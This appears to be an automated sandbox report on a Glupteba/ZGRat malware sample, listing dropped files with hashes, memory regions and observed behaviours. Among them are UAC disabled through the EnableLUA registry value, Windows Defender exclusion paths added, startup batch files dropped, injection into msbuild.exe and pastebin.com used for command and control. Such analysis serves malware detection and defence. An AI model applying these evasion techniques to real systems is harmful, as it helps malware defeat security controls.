SHA512 1f44a360e8bb8ada22bc5bfe001f1babb4e72005a46bc2a94c33c4bd149ff256cce6f35d65ca4f7fc2a5b9e15494155449830d2809c8cf218d0b9196ec646b0c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar5B85.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dcbf3818db5944b6adf17f41a0a28750
SHA1 57fa07ac645ed3dc043482643b244a3018b55022
SHA256 18bdc77c48b37f66b59fe15b6efc42b80e4eaaf59b79a8898c5e7f55ec2e2b89
SHA512 aaed78f55f6a4d1fc8eb4c38285741a0d7bb570f9a64fa3e61d491af5411b6092db61ce70bfb24f3bc9b8e822badd09e04653cd31566b76bd2944d29eaf94693

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bed576f5fbd09b243473bc558de35254
SHA1 d2a260dae35b7a924cae8b0913591e73ccfe08c9
SHA256 36850867f7ec4036e62cbe03e03c6d2c59488c6aee6dbbaf43e660655728f652
SHA512 e5eca1969efa38753fa2e8634cad4a4521f3a850d8b22dbba1602bfab19ae4385f1dfd4762b9b665c3b83362022f9042d2a462bd546c4722753bd0b05ec93347

\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe

MD5 cae69d5c81409ec9162f8bd1b07533f7
SHA1 9aea0a70c0fc3b60df129f9c3d5a42a0eaafae68
SHA256 be5f5f4dc0731d21d0193287437c41a21ca8981d7970beaeecceaf3962568aab
SHA512 34977a5194cbf947deb5e0705baad4d20fd06c600580736269de96ef1ab0e5f6f6b8f3d9d8203999d926ef1c337d28f08aa92af4f86df7201714fbf5b137de69

C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe

MD5 7341c4e85f4d8f7c00616b3fbbb73204
SHA1 b164950d93fd0b5fa51a6796c9cf79051a90e2cc
SHA256 12cb93fa727511eecd5a7721b71eae16305bb700a748be745bbce4ab6e65be4b
SHA512 83b519c34a9e52f526755d91fe0ff19716d1fedb9552f1e8da66ba59b45782bb173b8f926dff2e5cf0681fb6cfda485823f6aee190bc0ec804008059849e7f1d

memory/1952-291-0x00000000042E0000-0x00000000046D8000-memory.dmp

memory/2856-292-0x0000000004150000-0x0000000004548000-memory.dmp

memory/1960-293-0x0000000004330000-0x0000000004728000-memory.dmp

memory/308-294-0x0000000000400000-0x0000000002599000-memory.dmp

memory/2856-299-0x0000000000400000-0x0000000002958000-memory.dmp

\Users\Admin\AppData\Local\Temp\u8k.0.exe

MD5 adaa7779ccd1879d9466706724ca2974
SHA1 af546b538b5362ee19131e8d30b633c817417d15
SHA256 7109bdc186a84c29affbe2882b747b8c32587ce4e8d4b39e770faa06d94431d8
SHA512 96fa1c074b4f268393f17b400711898178ce8479272d5b6ca1405568dbe63cc618b46bfb5b80a8b97a7a796f6d4b60c3727beb2b2a13d7e749b3746b736bff87

\Users\Admin\AppData\Local\Temp\u8k.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/308-328-0x0000000000400000-0x0000000002599000-memory.dmp

memory/1044-333-0x00000000043F0000-0x00000000047E8000-memory.dmp

memory/2040-354-0x0000000070D20000-0x0000000070D26000-memory.dmp

memory/2040-353-0x0000000070D30000-0x0000000070D36000-memory.dmp

memory/2040-349-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1952-348-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1960-352-0x0000000000400000-0x0000000002958000-memory.dmp

memory/2040-360-0x0000000070CC0000-0x0000000070CCF000-memory.dmp

memory/2040-359-0x0000000070CD0000-0x0000000070CE7000-memory.dmp

memory/2872-361-0x000007FEF5C73000-0x000007FEF5C74000-memory.dmp

memory/664-366-0x0000000004210000-0x0000000004608000-memory.dmp

memory/808-375-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 703c06a2d6533a8f8d65ee25e04b45f0
SHA1 4d9e12da67111de2fe55281864a18b66bea31fb6
SHA256 e524b6a3480e4063c7211895e273e2cca0c87a3d19053e7f7b6500b6001d4b38
SHA512 ade7fab886d90df4e34c9218e33d4e4e81d6e2c2a26457288f2c8e75a3b7026363a864a8e90d23ada8214ac65eccf8b63445565fe7970f5004f5f0daacbccbcb

memory/532-408-0x0000000004220000-0x0000000004618000-memory.dmp

memory/2872-417-0x000007FEF5C70000-0x000007FEF665C000-memory.dmp

memory/808-413-0x0000000000400000-0x0000000002575000-memory.dmp

memory/1044-412-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1464-418-0x0000000004470000-0x0000000004868000-memory.dmp

memory/532-428-0x0000000000400000-0x0000000002958000-memory.dmp

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

memory/664-451-0x0000000000400000-0x0000000002958000-memory.dmp

memory/808-452-0x0000000000400000-0x0000000002575000-memory.dmp

memory/1748-453-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/1464-454-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1044-455-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1084-456-0x0000000004180000-0x0000000004578000-memory.dmp

memory/1464-457-0x0000000000400000-0x0000000002958000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/2924-470-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 f0616fa8bc54ece07e3107057f74e4db
SHA1 b33995c4f9a004b7d806c4bb36040ee844781fca
SHA256 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA512 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

memory/2924-478-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 654ffa345718afd9587d0c691a7c099e
SHA1 067258637afd4837ec608126a45eacf0022b45db
SHA256 270fa4011cee954e1dcddc1760cfe544aa30e2b8772428fddc0a533d4198d970
SHA512 6b495c1aefc666e2492473cf9de6742eb9473719312ab96795c0409049109c5270fe5513d6cc3731c2dda39eb52f2c8f5cbd03146699472a60e6b6629439834c

memory/1748-509-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/1740-510-0x0000000000870000-0x00000000040A4000-memory.dmp

memory/1740-522-0x000000001E040000-0x000000001E04C000-memory.dmp

memory/1740-521-0x0000000000740000-0x0000000000750000-memory.dmp

memory/1740-520-0x000000001E960000-0x000000001EA6A000-memory.dmp

memory/1740-523-0x0000000000750000-0x0000000000764000-memory.dmp

memory/1740-524-0x000000001EA80000-0x000000001EAA4000-memory.dmp

memory/1740-532-0x000000001EB30000-0x000000001EBE2000-memory.dmp

memory/1740-531-0x0000000000710000-0x000000000073A000-memory.dmp

memory/1740-530-0x00000000006E0000-0x00000000006EA000-memory.dmp

memory/1740-533-0x00000000006F0000-0x00000000006FA000-memory.dmp

memory/1740-537-0x000000001FB00000-0x000000001FE00000-memory.dmp

memory/1740-539-0x00000000057E0000-0x00000000057EA000-memory.dmp

memory/1740-542-0x0000000005910000-0x0000000005932000-memory.dmp

memory/1740-541-0x000000001F3E0000-0x000000001F442000-memory.dmp

memory/1740-540-0x0000000005900000-0x000000000590A000-memory.dmp

memory/1740-545-0x0000000005930000-0x000000000593C000-memory.dmp

memory/1084-546-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1084-580-0x0000000000400000-0x0000000002958000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\a34b5051478c01d83934dd5b0120757f7e5ff041b03ce291cb3621788d299269\d78301e574404b5487f84ab89551d4d4.tmp

MD5 1aec7b605d3b43e19eff677c38b75606
SHA1 e2be58b7ff143f09b84ebe1a1de869bdb469fe5f
SHA256 b0dd506574e8fe2f8bc65cd327be625ed4a3780cc2d45c02fc090f79d2277144
SHA512 7a604995dd68c35d32e0ebddd71001ac4328fb5bb8356b9323e762fb52216ae431d47a4f0f0a894cd8ca906e9cf0dee3f897e10bd09ca2d9bc42940800a08787

memory/1084-589-0x0000000000400000-0x0000000002958000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

memory/1084-623-0x0000000000400000-0x0000000002958000-memory.dmp

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/800-627-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2120-630-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/800-632-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1084-633-0x0000000000400000-0x0000000002958000-memory.dmp

memory/2120-634-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1084-636-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1084-643-0x0000000000400000-0x0000000002958000-memory.dmp

memory/2120-644-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1084-645-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1084-647-0x0000000000400000-0x0000000002958000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-10 08:27

Reported

2024-05-10 08:30

Platform

win10v2004-20240508-en

Max time kernel

115s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A

Windows security bypass

evasion trojan

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe = "0" C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A

ZGRat

rat zgrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\asAheTdhCAIm9CQNLQD0rOyN.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SvfrmvKdhBvUqKO4S0gOXkTu.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5en6Erc4OYeal8BONOTdbHGe.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L0iFTrBQXAnAVpYr34cocPEG.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\s3NPb6g6wbs1UE0fiYBIeyjt.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\m8cPA2SXtxGNIP20CULLqvRC.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZGF2DtoM4wuljmHA4CvB70hE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A

Windows security modification

evasion trojan

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe = "0" C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A

Checks whether UAC is enabled

evasion trojan

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2108 set thread context of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2108 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2108 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2108 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2108 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2108 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2108 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2108 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2108 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2108 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2108 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 436 wrote to memory of 4948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe
PID 436 wrote to memory of 4948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe
PID 436 wrote to memory of 4948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe
PID 436 wrote to memory of 2424 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe
PID 436 wrote to memory of 2424 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe
PID 436 wrote to memory of 2424 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe
PID 436 wrote to memory of 4108 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe
PID 436 wrote to memory of 4108 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe
PID 436 wrote to memory of 4108 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe
PID 436 wrote to memory of 4840 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe
PID 436 wrote to memory of 4840 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe
PID 436 wrote to memory of 4840 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe
PID 436 wrote to memory of 1816 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe
PID 436 wrote to memory of 1816 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe
PID 436 wrote to memory of 1816 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe
PID 4108 wrote to memory of 1424 N/A C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4108 wrote to memory of 1424 N/A C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4108 wrote to memory of 1424 N/A C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2424 wrote to memory of 3440 N/A C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2424 wrote to memory of 3440 N/A C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2424 wrote to memory of 3440 N/A C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4840 wrote to memory of 2112 N/A C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4840 wrote to memory of 2112 N/A C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4840 wrote to memory of 2112 N/A C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1816 wrote to memory of 228 N/A C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
